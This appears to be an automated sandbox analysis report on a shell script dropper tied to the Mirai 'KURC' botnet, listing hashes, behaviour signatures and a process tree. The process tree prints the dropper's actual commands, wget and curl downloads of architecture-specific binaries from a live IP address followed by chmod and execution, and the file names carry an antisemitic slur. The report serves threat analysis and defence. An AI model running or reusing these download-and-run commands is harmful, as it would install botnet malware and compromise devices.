Overview

overview

10

Static

static

1

jewn.sh

ubuntu-18.04-amd64

10

jewn.sh

debian-9-armhf

10

jewn.sh

debian-9-mips

10

jewn.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    36s
  • max time network
    154s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    07/12/2024, 04:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    jewn.sh

  • Size

    1KB

  • MD5

    720a5e4e44f99b055d00bf5be3948b2d

  • SHA1

    684fa717c79344199982029892b768a335682f57

  • SHA256

    c5529040db9e0e5cbe26dac8162859d8867ae845a6b2fdfdcad8ee2cfe63ff1d

  • SHA512

    c9b4f2f2e6f9e0c66421ae95641f013e7be7652e9b4787cc84cab88e24fe18e471b77249de3c210fe410e16312dbef499b5e81b8d03ffb4ad1796f5dc1a04b1a

Score
10/10
miraikurcbotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

KURC

Extracted

Family

mirai

Botnet

KURC

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (78231) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 2 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Writes file to system bin folder 2 IoCs
  • Changes its process name 1 IoCs
  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 6 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/jewn.sh
    /tmp/jewn.sh
    1⤵
    • Writes file to tmp directory
    PID:697
    • /usr/bin/wget
      wget http://104.234.240.71/bins/jew.x86
      2⤵
      • Writes file to tmp directory
      PID:700
    • /usr/bin/curl
      curl -O http://104.234.240.71/bins/jew.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:718
    • /bin/cat
      cat jew.x86
      2⤵
        PID:737
      • /bin/chmod
        chmod +x jewn jewn.sh jew.x86 systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-o2j0CD
        2⤵
        • File and Directory Permissions Modification
        PID:739
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        PID:740
      • /usr/bin/wget
        wget http://104.234.240.71/bins/jew.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:743
      • /usr/bin/curl
        curl -O http://104.234.240.71/bins/jew.mips
        2⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:751
      • /bin/cat
        cat jew.mips
        2⤵
        • System Network Configuration Discovery
        PID:763
      • /bin/chmod
        chmod +x jew.mips jewn jewn.sh jew.x86
        2⤵
        • File and Directory Permissions Modification
        PID:765
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Writes file to system bin folder
        • Changes its process name
        PID:766
      • /usr/bin/wget
        wget http://104.234.240.71/bins/jew.mpsl
        2⤵
        • Writes file to tmp directory
        PID:772
      • /usr/bin/curl
        curl -O http://104.234.240.71/bins/jew.mpsl
        2⤵
        • Reads runtime system information
        PID:784

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • /tmp/jewn
      Filesize

      60KB

      MD5

      c790dde9d4762b3e82c0d9e41df91fb9

      SHA1

      341070d0148f795a2b6dd1d988e497f4084bebe7

      SHA256

      e8ca93ec9f737481e131b64981ebf0212958dd1b43ef36a944869ae0f603e6f1

      SHA512

      ffa49eae4d60f3ff6f1b0fe053c5f8293e6eca3737d2805e464336376ca6f705da949936530c595bc33b4c49b7a80d8672f03414f027421394436b26c471697f

      Download Submit

    • /tmp/jewn
      Filesize

      125KB

      MD5

      e20014e57c7c30bb2bda9aa339fc4aff

      SHA1

      a49e3de31275f2f55351494da979e4f9c7e97f3c

      SHA256

      c7b2789a6ad425fc8bc48a6b496a2e2d8951ea80a1c908fc7914e99a11674150

      SHA512

      b6db6b572bed7f1bfc9986a3157f8bb8e07ac31b19df39e7b2182c5d432b87a4165584801d0d3a320e93c8bb1b3cd582fcdff4531af2df75523207444673f2df

      Download Submit